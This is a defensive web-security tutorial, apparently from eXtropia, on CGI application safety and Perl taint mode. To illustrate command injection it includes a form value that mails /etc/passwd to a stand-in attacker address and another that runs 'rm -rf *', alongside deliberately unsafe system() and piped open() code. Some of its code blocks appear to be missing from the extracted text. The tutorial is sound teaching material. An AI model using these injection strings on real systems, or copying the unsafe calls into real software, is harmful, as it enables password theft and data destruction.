Web Security and eXtropia Applications
[ TOC ]
[ TOC ]
"All data is fraudulent.
All communications are attempted hacks.
All clients are thieves.
Technology is only my first and weakest line of defense"
- morning litany for a Web Server Administrator
The minute you connect your computer to the Internet is the minute that the
security of your data has been compromised. Even the most secure systems,
shepherded by the most intelligent and able system administrators, and
employing the most up-to-date, tested software available are at risk every
day, all day. As was proven by Kevin Mitnick in the celebrated cracking of
the San Diego Supercomputer Center in 1994, even the defenses of seasoned
security veterans like Tsutomu Shimamura can be cracked.
The sad fact is that crackers will always have the upper hand. Time,
persistence, creativity, the complexity of software and the server
environment, and the ignorance of the common user are their weapons. The
system administrator must juggle dozens of ever-changing, complex
security-related issues at once while crackers need only wait patiently for
any slip-up. And of course, system administrators are only human.
Thus, the system administrator's job certainly can not be to build a
``cracker-proof'' environment. Rather, the system administrator can only
hope to build a ``cracker-resistant'' environment.
A cracker-resistant environment is one in which everything is done to make
the system ``as secure as possible'' while making provisions so that
successful cracks cause as little damage as possible and can be discovered
as soon as possible.
Thus, for example, at minimum the system administrator should backup all of
the data on a system so that if the data is maliciously or accidentally
erased or modified, as much of it as possible can be restored.
NOTE: By the way, don't think that just because your job
title is not officially "system administrator" that this
does not apply to you. In fact, as soon as you implement
a CGI application, you become a system administrator of
sorts. For example, the implementer of a WebStore CGI
application will have her own users, data files, and
security concerns. Thus, it is also your responsibility
to make security your number one concern.
Here is a rough check list of minimum level security precautions:
1. Make sure users understand what a good password is and what a bad
password is. Good passwords cannot be found in a dictionary and take
advantage of letters, numbers and symbols. Good passwords are also changed
with some regularity and are not written on scraps of paper in desk
drawers.
2. Make sure that file permissions are set correctly. All files should be
given the absolute minimum access rights.
3. Make sure to keep abreast of security announcements, bug fixes and
patches. For example, put yourself on a CERT (http://www.cert.org/) or a
CIAC (http://www.ciac.org/) mailing list and/or return regularly to the
sites that distribute the code you use. For eXtropia applications, add
yourself to the mailing list in order to get security bulletins.
4. Attempt to crack your site regularly. Learn the tools the crackers are
using against you and try your best to use those tools to crack yourself.
5. Make regular backups.
6. Create and check your log files regularly.
[ TOC ]
Protecting a site is a serious matter and one that everyone should take
time to address. Unfortunately, too many web server administrators make the
mistake of saying that, "Since I don’t have a high visibility
site, and since I don't have a beef with anyone, no one will bother to
mess with me."
In fact, you are a target as soon as you have a web presence. Many crackers
need no greater excuse than the desire to cause mischief to crack your
site.
Once a cracker has access to your system, he or she can do all sorts of
mean and nasty things.
Consider some of the following possibilities:
1. Your data/files are erased.
2. Your data/files are sold to your competitor.
3. Your data/files are modified. Check out what happened to the CIA site
and others at http://www.2600.com/hacked_pages/.
4. The cracker uses your site to launch attacks against other sites. For
example, the cracker attempts to crack the White House server as you.
5. The confidential information provided by your clients is accessed and
used against them. ``Well, Mr. Powers, I see from this log file that you
have purchased one Swedish penis enlarger!''.
6. Cracker uses your account to launch attacks against other users on the
same box. Other innocent users have all this happen because of you.
[ TOC ]
Web services are some of the most dangerous services you can offer.
Essentially, a web server gives the entire net access to the inner workings
of your file system. What is worse is the fact that since web server
software has only been around since the end of the 1980's, the security
community has only had a limited amount of time to scrutinize security
holes. Thus, web servers amount to extremely powerful programs which have
only been partially bug-tested.
If that were not bad enough, web servers are typically administered by new
web server administrators with perhaps more experience in graphic design
than server administration. Further many web servers are home to hundreds
of users who barely know enough about computers to write HTML and who are
often too busy with their own deadlines to take a moment to read things
such as this.
This is not to point fingers at anyone. Few people have time or inclination
to master security. And that is as it should be. The point is that bad
passwords, poorly written programs, world readable files and directories
and so forth will always be part of the equation and these are not things
that only security gurus can control.
[ TOC ]
Beyond the fact that web servers are insecure to begin with, web servers
make a bad situation worse by allowing users to take advantage of CGI
applications.
CGI applications are programs that reside on a server and can be run from a
web browser. In other words, CGI applications give Joe Cyberspace the
ability to execute powerful programs on your server that in all likelihood
are first generation, designed by amateurs, and full of security holes.
Yet, since most users have grown to expect CGI access, few system
administrators can deny their users the ability to write, install and make
public CGI applications of all sorts.
So what is a system administrator to do and how can users of CGI
applications help to promote the security of the server as a whole?
As is the case with all security, the administrator and users must attempt
to address the following precautions:
CGI applications must be made ``as safe as possible''. The inevitable
damages caused by cracked CGI applications must be contained.
[ TOC ]
Needless to say, every application installed on a server should be reviewed
by as many qualified people as possible. At very least the system
administrator should be given a copy of the code (before and after your
modifications), information about where you got the code, and anything else
she asks for.
Don't think of your system administrator as a paranoid fascist. She has a
very serious job to do. Help her to facilitate a safer environment for
everyone even if that means a little more work for you.
Besides that, you should read the code yourself. There is no better time to
learn this stuff than now. Although ignorant users will necessarily be part
of the security equation it does not give you the go-ahead to be one of
those users.
And remember, any bit of code that you do not understand is suspect. As a
customer, demand that application authors explain and document their code
clearly and completely.
However, you have a further responsibility. You have the responsibility to
keep aware of patches, bug fixes, and security announcements. It is likely
that such information will be posted on the site from which you got the
application. It certainly is posted on eXtropia. As new versions come out,
you should do your best to upgrade. And when security announcements are
issued, you must make the necessary modifications as soon as possible.
The fact that the information is available to you means that the
information is also available to crackers who will probably use it as soon
as it is available.
This point is particularly important for all you freelance CGI developers
who install applications for clients and then disappear into the sunset. It
is essential that you take the responsibility to develop an ongoing
relationship with your clients so that when security patches are released
you can notify them so that they can hire you or someone else to implement
the security changes.
[ TOC ]
Although this section is primarily focused on installing and customizing
pre-built web applications, no discussion of security would be complete
without a note on writing safe code. After all, some of the
installation/customization work you do might involve writing some code.
Perhaps the best source for information on writing safe CGI applications
can be found at Lincoln Stein's WWW Security FAQ
(http://www.w3c.org/Security/faq/). Lincoln Stein is a gifted CGI
programmer with several public domain talks and FAQS regarding techniques
for writing safe CGI.
You should not even consider writing or installing a CGI application until
you have read the entire FAQ. However, we will reproduce the most important
warning since it should be said several times.
In the FAQ, Stein writes the following,
"Never, never, never pass unchecked remote user input to a
shell command. In C this includes the open(), and system()
commands, all of which invoke a /bin/sh subshell to process
the command. In Perl this includes system(), exec(), and
piped open() functions as well as the eval() function for
invoking the Perl interpreter itself. In the various shells,
this includes the exec and eval commands."
Backtick quotes, available in shell interpreters and Perl for capturing the
output of programs as text strings, are also dangerous. The reason for this
bit of paranoia is illustrated by the following bit of innocent-looking
Perl code that tries to send mail to an address indicated in a fill-out
form.
|
|
$mail_to = &get_name_from_input; # read the address from form
open (MAIL,"| /usr/lib/sendmail $mail_to");
print MAIL "To: $mailto\nFrom: me\n\nHi there!\n";
close MAIL;
|
The problem is in the piped open() call. The author has
assumed that the contents of the $mail_to variable will always
be an innocent email address. But what if the wily hacker passes an email
address that looks like this?
|
|
nobody@nowhere.com; mail badguys@hell.org</etc/passwd;
|
Now the open() statement will evaluate the following commands:
|
|
/usr/lib/sendmail nobody@nowhere.com
mail badguys@hell.org</etc/passwd
|
Unintentionally, open() has mailed the contents of the system
password file to the remote user, opening the host to password-cracking
attack.``>
Other CGI security FAQS include:
1. NCSA Security FAQ: http://hoohoo.ncsa.uiuc.edu/cgi/security.html
2. eXtropia Taint Mode FAQ: http://www.extropia.com/tutorials/taintmode.html
3.CGI Security: Better Safe Than Sorry: http://www.irt.org/articles/js184/index.html
[ TOC ]
Have you ever investigated a web site by modifying the URL? For example,
let's look at one of the pages on eXtropia that can be found at http://www.extropia.com/news.html.
Notice that we are looking at the document news.html file that is in the
root directory of the web server ``www.extropia.com''.
Suppose we are interested in knowing what other documents are located in
the ``private_stuff'' directory (perhaps documents under development,
documents which have been forgotten about, or documents which might have
unlisted links for internal use only). To find out, we remove the
``news.html'' reference and test to see if the web administrator has
configured the web server to generate a dynamic index and have not included
an index file.
In this case we have not.
What you are not looking at is a dynamically created index page containing
all files and sub-directories. In fact, many servers on the web are
configured so that if the user has not provided an index.html file, the
server will output a directory listing much like this. This is not exactly
a security bug. Oftentimes, as is the case with our site, the system
administrators wanted users to be able to view directory structures.
However, if the server is set to produce a dynamically generated index of a
cgi-bin directory, the results can be devastating.
1. Configure the web server to not generate dynamically produced indexes
but return an error message instead.
2. Configure your web server to not serve any document other than .cgi
documents from within a cgi-bin directory tree.
3. Provide an index.html file with nothing in it so that even if the web
server is not configured for CGI security, the cracker will be stopped in
their tracks.
4. Move as many of the sensitive files as you can out of the web document
tree.
There is another aspect of the snooper that you should definitely be aware
of when installing pre-built applications. Snoopers have just as much
ability to download the source code and read through it as you do. Thus,
they are aware of all of the pre-configured options that are set by
default.
In particular, they are aware of filenames and relative directory
locations. Thus, if you do not change the default names of files and
directories, even if you have stopped them from using the back door and
getting directory listings as shown above, they will still know what is
available and can access it directly.
In other words, if I know that you are using ``CGI application A'' and that
``CGI application A'' uses a file called ``users.dat'' in a subdirectory
called ``Users,'' I might look for it directly using:
http://www.yourdomain.com/cgi-bin/ScriptA/Users/users.dat
In such a way, a cracker could easily gain sensitive information.
As a result, it is crucial that you also rename any file or directory that
contains sensitive information. Once you have made it impossible for the
hacker to get a dynamically generated index and you have changed all
filenames and directory names, it will be much more difficult for the
cracker to find her way in.
[ TOC ]
It is pretty much unavoidable. Any truly complex CGI application is going
to have to write to the file system. Examples of writing to the file system
include adding to a password file of registered users, creating lock and
log files, or creating temporary state maintenance files.
The problem with this is two-fold. First, if the web surfer is given
permission to write, she is also, necessarily given permission to delete.
Writing and deleting come hand in hand. They are considered equal in terms
of server security.
The second problem with writable files is that it is possible that a
cracker could use the writable area within your cgi-bin tree to add a CGI
application of their own. This is particularly dangerous on multi-user
servers such as those used by your typical ISP. A cracker need only get a
legitimate account at the same ISP you are on long enough to exploit the
security hole. This amounts to 20 minutes worth of payment on their part.
NOTE: By the way, this cracker tactic of getting an
account on your ISP also has serious implications for
"snooping". If the cracker can get an account on your
server, there is little to stop her from getting at your
cgi-bin directory and snooping around. With luck, your ISP
runs a CGI wrapper which will obfuscate your cgi-bin area
to some degree, but one way or the other, so long as you
host your web site on a shared server, your security is
seriously compromised. This makes backups even more
crucial!
For the most part, the solution to this is to never store writable
directories or files within your cgi-bin tree. All writable directories
should be stored in less sensitive areas such as outside of your HTML tree
or in directories like /tmp that are already provided for insecure file
manipulation. A cracker could still erase your data but they could not
execute their own rogue CGI application.
However, as we said before, security is about containing damage as well as
it is about plugging holes. Thus, it is essential that you protect all
files against writing unless you are currently working on them. In other
words, if you are not editing an HTML file, it should be set to read-only
access. If you are not currently editing the code of a CGI application, it
should be stored as read-execute-only.
In short, never grant write permission to any file on your web server
unless you are specifically editing that file.
Finally, always backup your files regularly.
[ TOC ]
All input is an attempted hack. All input is an attempted hack. All input
is an attempted hack. Learn those words and repeat them to yourself every
day. It is essential for you to consider all information that comes into
your CGI application as tainted. The example shown earlier provided by
Lincoln Stein is a good example of the kinds of havoc a cracker can create
with tainted data. A cracker could easily attempt to use your CGI to
execute damaging commands.
An interesting addition to what Stein has to say relates to Server Side
Includes (SSI). That is, if your server is set to execute server side
includes, it is possible that your CGI application could be used to execute
illegitimate code.
Specifically, if the CGI application allows a user to input text that will
be echoed back to the web browser window through plain HTML files, the
cracker could easily input SSI code. This is a common misconfiguration
error for programs like guestbooks. The solution to this problem, of
course, is to filter all user data and remove any occurrence of SSI
commands. Typically, this is done by changing all occurrences of ``<!''
to ``<-''. Thus, SSI commands will be printed out instead of executed.
A better option is to disable SSI command execution that is even more
dangerous than CGI, especially when combined with CGI.
[ TOC ]
In February 2000, CERT posted advisories related to CSS-- Cross Site
Scripting. No, this is not the same as CSS, Cascading Style Sheets, but
rather is the unfortunate acronym that CERT assigned to this problem.
In a nutshell, the advisory ultimately related to the fact that you cannot
trust user input in CGI scripts, especially if that
input will be used to produce further output from the CGI script.
Previously we talked about how user input needs to be watched relative to
causing damage to your web site. But what about the other visitors to your
site?
Badly coded HTML can be equally annoying, or if they take advantage of
browser security problems, dangerous. Consider a piece of javascript code
that continually places alert() dialog boxes on a user's
browser. That user would probably not want to come back to your site soon
afterwards.
However, if you allow other users to post HTML into a message forum,
guestbook, or another application where user's share information, then you
are opening your web site to this problem of Cross Site Scripting where a
user can post malicious code on your application that other user's access.
To avoid this problem, there are a few things you should consider doing in
such applications. First, you could use
Extropia::DataHandler::HTML. This data handler escapes HTML tags characters so they are rendered
useless (eg < with <). Another technique is to enable authentication for user data
submissions so that you can keep track of who posted malicious HTML code.
In addition, because there are problems with how browsers interpret
different character sets, the < > can sometimes have aliased
characters in a different character set. To get around this problem, the
character set should be explicitly stated along with the Content-Type
header. Note that the latest versions of CGI.pm and the Apache web server
tack on an explicitly stated character set by default since the CSS issue
was announced by CERT.
To obtain more details on CSS, the following two URLs should help you get
started:
http://www.cert.org/advisories/CA-2000-02.html
http://www.cert.org/tech_tips/malicious_code_mitigation.html
[ TOC ]
Another thing to understand about the legitimacy of incoming data is that
even the data that is supposedly generated administratively can be tainted.
It is very easy, for example, to modify hidden form fields or add custom
fields to incoming form data to a application. In fact, a cracker could
simply download your HTML form, modify it and submit faulty data to your
CGI application from their own server. Taint mode is a mode in Perl in
which all data that has originated from or comes into contact with user
input is considered suspect, or tainted. When running in taint mode, Perl
makes sure that tainted data cannot be used to perform operations that
might have destructive consequences if the data did not fit the expected
input to the program. It turns out that this capability is extremely useful
for CGI applications.
Unfortunately only a few references to taint mode documentation exist. Even
worse, the number of public domain Perl scripts that exist for CGI
programming that enable Taint mode that you could learn from by example is
virtually none.
However, if you would like to learn more, there are still a few useful
references. OReilly's Programming Perl book has a section on handling
insecure data that is also reflected in perldoc’s perlsec guide to Perl
Security within the Perl distribution. On the FAQ front, Lincoln Stein's
WWW Security FAQ is located at http://www.w3c.org/Security/faq/,
and our own taint mode security FAQ is at http://www.extropia.com/tutorials/taintmode.html.
[ TOC ]
Freeware CGI applications are available for download all over the Web. But
how many of them are really secure? When you download an application do you
check all the logic to make sure it is secure? Do you read through each
line of code and anticipate all the ramifications? Most of the time the
answer is ``no''. After all, the whole point of downloading software is to
get it and run it for free without having to do a lot of work.
Unfortunately, the harsh reality is that if you are really interested in
security, there isn't any free lunch out there.
The more complicated a CGI application is, the more likely you will want to
find someone else who has already programmed it and avoid doing the work
yourself. Also, the more complex a script, the less likely you will care to
spend the time scrutinizing it.
The problem is that regardless of how good the author is, every large
program has a good probability of having bugs -- with an additional
probability that some of them may be security bugs.
However, unlike other languages, Perl offers an ingenious programming model
built to check for security issues: taint mode. Basically, taint mode puts
a Perl application into ``paranoid'' mode and treats all user supplied
input as tainted unless the programmer explicitly ``OKs'' the data.
[ TOC ]
To enable taint mode for a script on a site which has Perl 5, change the
line at the top of your CGI script from
to
Unfortunately, non-UNIX web servers may have trouble activating taint mode
for CGI scripts. CGI Scripts running on non-UNIX Servers typically do not
recognize the magical #!/usr/local/bin/perl first line of the script.
Instead, the web server knows what language to execute the server with
because of an operating system or web server configuration variable.
For example, for IIS on NT, you should change the association of Perl
scripts to run with taint mode on. Unfortunately, this changes the
association for all your Perl scripts. You may not want this behavior if
you have legacy scripts that are not built to handle taint mode.
A more reasonable way is to get around the problem by creating a second
extension under NT such as tcgi or tgi and associate it with taint mode
Perl. Then, rename the applications with the new extension to activate
taint mode on them. Thus, even if you have legacy scripts that cannot
handle taint mode activation, their migration to taint mode can happen in a
planned fashion rather than all at once.
You could also try using another web server that understand the first line
of scripts. For example, SAMBAR, a freeware NT web server, can be
configured to run the script based on the first line of the cgi script.
Apache for Windows also has a similar capability. In this case, you would
change the first line to read something like the following:
|
|
#!c:\perl\bin\perl.exe -T
|
Note: when you execute a taint mode script from the
command-line with the Perl executable, you must pass
the -T parameter to the Perl executable or Perl will
complain that the '-T' argument was passed too late
in the first magic line of the Perl file.
[ TOC ]
You should test your application thoroughly to see if turning on taint mode
stops any valid part of your program from executing. Usually the majority
of your application will work well. In fact if you are lucky, the whole
program may work without any changes at all!
The major caveat to this is that taint mode is not a compile time check. It
is a run-time check.
Run-time checking means that taint mode Perl is constantly and vigilantly
checking to see if the application is going to do anything unsafe with user
input while the program runs. It does not stop checking after the
application first loads and compiles (compile-time checking).
Unfortunately, Run-time checking means that you need to test all logical
paths of execution your application might take so that ``legal operations''
do not get halted because of taint mode. Taint mode, because it is ultra
paranoid, will likely stop actions that you want your program to take.
Thus, you must go through the program with a fine tooth comb. If any part
of your program fails to execute, then you need to find out what taint mode
does not like about the program and rectify it.
Fortunately, the applications and objects in this book have been thoroughly
tested with taint mode. However, if you add your own additions or objects,
you should always conduct a test of the operations of your program to make
sure it is still doing what you want.
Likely, if there is a problem with taint mode, you will encounter an error
in the Web Server error log. For example, if we try to run a program with
tainted user input passed to a system call, we would get something that
looks like the following error:
|
|
Insecure dependency in system while running with -T switch at ...
|
Likewise, if we have an unclean PATH, a system call may complain about the
path being insecure:
|
|
Insecure $ENV{PATH} while running with -T switch at ...
|
[ TOC ]
For a CGI application, the only user input is user submitted form data. It
is this user input that the Perl application will consider ``tainted''.
This does not mean that you have to immediately go through a lot of hoops
to untaint all the form variables that come in. Not only would that be a
big pain to do, but its unnecessary.
Instead, Perl only considers the combination of form variables plus the use
of a potentially ``unsafe'' operation to be illegal. Potentially ``unsafe''
operations are operations that could have a permanent destructive effect if
the wrong parameters are passed.
Potentially unsafe operations include, but are not necessarily limited to,
system calls of any sort such as using system, backticks or piped open
function calls, open calls that can write to disk, unlink which deletes
files, rename, as well as the evaluation of code based on user input.
In the example given below, we use ``mail'' as an example program, but
really the examples here apply to any system call with command line
parameters.
For example, if the CGI object's email form variable is ``tainted'', then
the following would still be legal:
|
|
print $cgi->param("email") . "\n";
|
This passes Perl’s taint mode check because the print command is not an
unsafe operation. But if you try to pass the same variable to an unsafe
version of a system call, Perl will complain.
|
|
system("mail " . $cgi->param("email"));
|
This operation is illegal under taint mode. Making an unsafe system call
plus passing form data as a command line argument is terribly unsafe and is
considered unacceptable by Perl running in taint mode. Consider what would
happen if someone entered an email address on the form like
|
|
me@mydomain.com; rm -rf *
|
This would cause the mail program to be executed with the following
command-line:
|
|
mail me@mydomain.com; rm -rf *
|
The mail program would execute, but at what cost? The semi-colon is a shell
metacharacter that tells the operating system shell to launch another
command. In this case, it is the malicious 'rm -rf *' that is a command to
delete all files for the current directory and all subdirectories
recursively.
[ TOC ]
A shell metacharacter is a special character that has meaning to a shell or
command-line interpreter that tells it to execute a command or perform some
action. Therefore, shell metacharacters are the most dangerous to pass to
an executable program because they can cause unexpected and undesirable
behavior.
The following is a sample list of shell metacharacters:
Clearly, there are security ramifications. With taint mode turned on
though, the Perl interpreter will stop this from occurring at all. However,
Perl can't tell what is in the CGI object -- it just assumes HTML form data
is tainted whether it is friendly or not. Just to be on the safe side, Perl
assumes that all users are malicious.
Thus, if you want to perform that type of command with a user supplied
variable, you must always untaint it regardless of whether it contains
harmless input or not. Remember, Perl only sees that the string was created
as a result of user input (such as a form variable). It has no way of
knowing whether the string is safe or not until you untaint it with the
techniques we outline here.
It is important to emphasize that this advice is true even for hidden form
tags in an HTML page. HIDDEN form tags that are not directly entered by a
user are considered tainted by Perl because Perl has no way of telling that
the user did not enter that form variable.
After all, it is possible for a user to create their own HTML form and
place their own hidden tag values on that form. In other words, all form
data passed to the CGI script is considered tainted by Perl.
[ TOC ]
The primary way to untaint a variable is to do a regular expression match
using groupings enclosed by parentheses inside your expression match
pattern. (In Perl, the first matching pattern, enclosed by parentheses in
your 'regexp', will be stored in the special variable ``$1''; a match for
the second pattern-in-parentheses will be stored in ``$2'', and so on.
Thus, given the data and the regexp the value of $1 becomes
[val1] and the value stored in $2 will be [val2].)
parenthetical groups inside the regular expression pattern match. In Perl,
the first parenthetical group match gets assigned to $1, the second
parenthetical group to $2, and so on.
Perl considers these new variables that arise from parenthetical groups to
be untainted because they arose from a clean operation. Once your regular
expression has created these variables, you can use them as your new
untainted values.
The following will illustrate this:
Email addresses consist of word characters (a-zA-Z_0-9), dashes, periods
and an @ sign. So we want to match this descriptive template. But there is
a catch.
If we allow email addresses to have dashes, a lot of programs use dash to
signify a command-line parameter. So although we allow dashes in the email
address, if you want to be extra careful, make sure that the first
character of the email address is only a word character and does not
contain dashes or periods. The likelihood that someone really has an email
address that begins with a period or dash is relatively low.
Thus, our descriptive template becomes the following:
Match first character as a word character, no extra ones allowed like
dashes.
Match 0 or more subsequent characters as word characters that can also
include dashes and periods.
Match at least one @ symbol after the preceding two rules.
Match every character (at least one) for the domain name of the email
server after the @ symbol. This can consist of word characters, dashes, and
periods.
The regular expression for this template is:
|
|
/
\w{1} # match 1 word character
[\w-.]* # match 0 or more word character, hyphen or period.
\@ # match any one @ symbol
[\w-.]+ # match one or more word character, hyphen or period.
/
|
Note: some of these characters are considered
shell meta characters. However, because we are
disallowing white space as well as forcing the
first character to be a word character not
containing any meta characters, we are
significantly safer.
Further, let us assume that somewhere in the program a variable called
$email has been assigned from the CGI object that contains a
value submitted by the user from an HTML form using a statement like the
following:
|
|
$email = $cgi->param("email");
|
Now the $email variable is now tainted as well. This is
because its value arose directly from another variable that contained
tainted (user input) data, namely the CGI object form variable returned
from the param method.
So to untaint a variable called $email, you would do the following with a
regular expression. Notice the addition of the parentheses to create a
parenthetical grouping.
|
|
if ($email =~ /(\w{1}[\w-.]*)\@([\w-.]+)/) {
$email = "$1\@$2";
} else {
warn ("TAINTED DATA SENT BY $ENV{'REMOTE_ADDR'}: $email: $!");
$email = ""; # successful match did not occur
}
|
OK. Let's go over this in a little more detail.
When you use () inside a regular expression, each group of parentheses is
mapped to a $# variable where # is the number mapped to however many groups
you have. For example, the first set of parentheses that matches in the
regular expression is referred to as $1.
In the above example, the first parentheses surround
(\w{1}[\w-.]*). This expression matches one or more word characters, dashes, and periods
with at least one word character before it which does not contain dashes or
periods. Because of the parentheses, this first match gets assigned to
$1 by Perl.
Then, an @ symbol is matched.
Finally, the second set of parentheses ([\w-.]+) matches one or more of any word characters, dashes, and periods. This
second match gets assigned to $2 by Perl.
If the regular expression is successful, $1 (first
parenthetical match) will equal the username portion of the email address
and $2 (second parenthetical match) will equal the domain
portion.
Thus, the next command, $email = "$1\@$2"; replaces the previously tainted email variable with the safe counterparts:
$1 followed by an @ symbol followed by $2.
Notice that $1 and $2 are both considered
untainted now. This is very important to see.
Yes, they did arise from the user input data, but Perl considers these
variables special. Perl believes that because they resulted from a regular
expression you set up, that you have explicitly checked the data for
validity in that regular expression. Thus, $1 and
$2 are not considered tainted because Perl believes in your
ability to set up a good clean regular expression check.
On the other hand, if the user entered an email address that did not match
this ``template'', $1 and $2 will equal nothing
because the regular expression will have failed. The example above would
assign $email = "" in this case because we would have executed the else clause.
Of course, if the user is trying to hack your system, this is a good thing.
You only want valid email addresses to come through. You should generally
check for the failure of the regular expression as we did above. Then, in
the else clause you can do something about the bad data.
As an additional plus, checking for the failure of the regular expression
allows you to do something such as print an informational message to STDERR
about the variable that did not pass taint checking along with the IP
address of the user that tried to pass it. An example of this was
illustrated in the else block of code above.
When a CGI script prints to STDERR, that output goes to your Web Server's
error log. You should always check your error log for potential hack
attempts. Of course, you could always add more sophisticated means of
notification such as emailing the bad data directly to you.
Also, if you are really worried about your program's integrity, you could
use die() instead of warn() to stop the program
rather than quietly warning you.
Additionally, the Extropia::Log classes may be useful in this case. For example, Extropia::Log::Composite can allow multiple types of logging to occur given multiple log objects.
There is another reason to use an if statement to check if the taint
regular expression match failed or not. The special variable
$1 will remain set to the last successful match if the current
regular expression was unsuccessful. Thus, if you are doing several regular
expression checks such as these, you may get subtle errors in the program
if you do not explicitly check if the match failed or not.
For example, the passed $1 from a previous regex could pass
along to another failed regex for a completely different variable. If an
email regex passed before a firstname regex, it would look very weird to
assign the $1 from the successful email regex to the firstname
variable.
Why Not Just Clear Taint Mode With An Open Regular Expression?
DON'T DO THIS!!!
Perl usually has a good reason for thinking the input is unsafe. For
example, there is a common misconception that HIDDEN INPUT tags on an HTML
form that are generated by a CGI script is ``safe''. This is not true
because a user could easily mimic your form by making their own HTML form
with bogus values. A user blindly untainting HIDDEN INPUT tag values will
be in hot water if someone does end up spoofing the values.
Taint mode will catch all this. Avoid the temptation to quickly dismiss a
tainted variable by using an ``open'' Regular expression. This cannot be
emphasized enough.
THE FOLLOWING CODE IS DANGEROUS AND SHOULD NOT BE DONE:
|
|
$email =~ /(.*)/;
$email = $1;
|
This will match any expression. Thus, effectively no check has actually
been done. Yet the $email variable has been untainted.
[ TOC ]
Apart from the mantra that you should never blindly choose a completely
open regular expression such as .* to untaint a value, you will typically
still be faced with some choice as to how to create a regular expression to
untaint your variable.
At minimum, you know that we should filter out shell meta characters that
might be interpreted badly by an external system call. There are two
different ways to come up with a regular expression: rejection of
characters and the acceptance of characters.
It is natural to think that we should write an untaint expression to be
based off the rejection of characters we deem 'bad'. This will usually
'work' in the practical sense of the word. However, while you are
untainting, you should consider honing your regular expression around the
specific data that you are attempting to solve.
By approaching the regular expression from the point of view of accepting
only characters that are valid for the data being untainted, you strengthen
the regular expression so that it doubles as a data validation routine.
This is important because logic errors may crop up in a program where bad
data is placed in a value by a user. To avoid logic errors due to hacking,
it is best to hone the regular expression around accepting only those
characters that make sense for the data you are dealing with while at the
same time filtering all the typical shell meta characters.
Recall that Perl considers $1 to be safe now because it trusts
that you tested the validity of the variable using the regular expression.
Perl cannot and does not judge your regular expression. If you choose to
make it too loose like the above regular expression, then Perl will let
you.
If you do this, you are short changing the point of taint mode which is to
make you sit down and think ``What input do I really want and how do I
restrict myself to just that set of characters?''.
[ TOC ]
There are two potentially unsafe operations that tend to cause the most
problem with taint mode activated. The first is the execution of external
programs and the other is loading code to evaluate. To troubleshoot these
operations it is important to understand where taint mode evolved from.
Taint mode has been around longer than CGI scripts have been around. So you
might ask yourself why was taint mode placed in Perl?
Part of Perl's origins came from systems administration. Unfortunately,
SysAdmin scripts usually need to be run as a privileged user such as root.
Thus, Perl was endowed with the power of taint mode in order to make
writing systems administration scripts more secure.
Unfortunately, this means that taint mode is frequently more paranoid than
we would like for CGI scripts. This is because SysAdmin scripts were
assumed capable of being executed directly from a UNIX shell. This is less
secure because a user has a great deal of control over the environment of
the UNIX shell including the ability to change the path that executables
are located in.
On the other hand, a web server provides a more secure environment because
users who run a CGI script do not have the capability of changing the
script's search path information.
One example of this is that the PATH environment variable stops CGI scripts
from running an external program. This means that we must clear out the
path and use absolute paths inside of system calls and other external
program calls in Perl using taint mode.
This restriction makes sense for a SysAdmin script where a user could
change the PATH environment variable at will and then run the SysAdmin
script with potentially changed behavior.
This level of paranoia makes less sense for CGI programs. However, paranoia
is what taint mode is all about and it is relatively easy to fix this issue
by configuring your script to use absolute paths.
Likewise, when taint mode is on, the current directory is no longer
considered valid for loading library or module files. Again, this is
paranoid behavior assuming that we could place our own subversive version
of a library in the current directory in order to change the behavior of a
SysAdmin script. However, CGI scripts called from a browser do not have to
worry about arbitrary code being uploaded to a server. If this is possible
on your web server, then you have a lot more problems to worry about.
But like the PATH problem, this library issue is easy to resolve as well.
If you wish to add library search paths from the current working directory
simply use the 'use lib' pragma. The following code would add back the
current working directory plus a Modules directory underneath it to the
library search path.
[ TOC ]
Before leaving this section, we'll provide a few take home messages about
taint mode.
First, consider logging bad taint/regular expression matches. If you are
writing applications which use this module set, please consider utilizing
the log feature in order to record the situation in which users enter bad
data in your forms.
Second, use the Web Server's error log. The error log is there to catch
errors. Even if you are not worried about taint mode problems occurring,
you should be checking the error log vigilantly in case other errors are
occurring. Remember, taint mode is not a security panacea. Logic errors in
your code can result in security issues as well.
Don't Rely Solely on Regular Expressions
This leads us to our third and most major taint mode point. Never trust
taint mode to do your work for you. You must always consider all logical
flows through your program and consider whether you want them allowed.
Always consider security a top priority.
For example, earlier we gave an example of untainting an email address.
This is all very well, but it is a very generic untaint operation. What if
your application must be more secure than that?
What if you only want to allow certain domains to be emailed or a certain
list of email users? If this is the case, then you should always write the
most strict code possible. Make sure that only those email addresses can be
mailed and no others. Otherwise you may be opening your program up to
unexpected behavior.
Unexpected behavior is undesirable. Avoid at all costs.
However, this does not mean that you should make your program inflexible.
If you want to limit email addresses, do not hard code the email addresses
in your program. Instead, consider placing an array of valid email
addresses in the setup file so that your valid email list can be changed
later on.
Avoid Needing to Untaint in the first Place
In addition, avoid passing untainted user variables if you can help it. In
our mail example, we passed the email address to the mail program on the
command-line. However, there are two better ways of doing this.
First, we can avoid passing the email address as a command line parameter
entirely by simply using a different mail program. For example, the UNIX
sendmail program has an option to allow the Email address to be placed in
STDIN.
A second thing we can do is call the mail program by passing the email
address as a parameter array instead of a single string to the
system() call. When a single string is passed to
system() Perl passes the string to the shell for processing
the command-line parameters. Unfortunately, as we have seen, this means we
must filter out shell metacharacters.
If the command-line parameters are passed to the system() call
as an array of parameters, the system() call will not parse
them using the shell, and so we can safely pass shell metacharacters in the
email address. For example, the following system() command is
unsafe if the email address is still tainted.
|
|
system("mail " . $cgi->param("email"));
|
However, we can mitigate this by passing the parameter as an element of the
array of parameters instead of one concatenated string. The following code
snippet illustrates this method of calling system().
|
|
system("mail",$cgi->param("email"));
|
It turns out that there is a very good reason that we may not wish to pass
email addresses that have been untainted by the regular expression we
explained earlier. The problem is that if we use the regular expression we
discussed previously to untaint variables, we will potentially miss out on
some email addresses. The reason for this is that our regular expression
was too restrictive.
Valid email addresses on the Internet allow such shell metacharacters as /,
&, and %. Consider the & character. Just like the semi-colon
discussed previously, & can be used to separate commands. Thus, if we
expand the email untaint regular expression to include &, to allow an
address like homer&marge@simpsons.com, we are potentially opening up a hole. Consider the following command:
This is very similar to the command where we used the semi-colon as a shell
metacharacter command delimiter previously. While it is true that this
scenario is hard to run across, you should take to heart that it is
difficult to anticipate what shell metacharacter combination might be
called into action.
Avoid the 'Russian Dolls' Scenario
A final piece of advice in taint mode security is to avoid the ``Russian
Dolls'' scenario. You should not just think about your program and the
program you are passing a tainted variable to. You should also consider all
the subsequent programs that might be called.
Usually this is not a problem. But what if it is? In the last taint mode
tip, we mentioned that there was a way to call sendmail by passing the
email address through STDIN instead of on the command line. This is way
safer because then shell escape characters will not get interpreted in
STDIN.
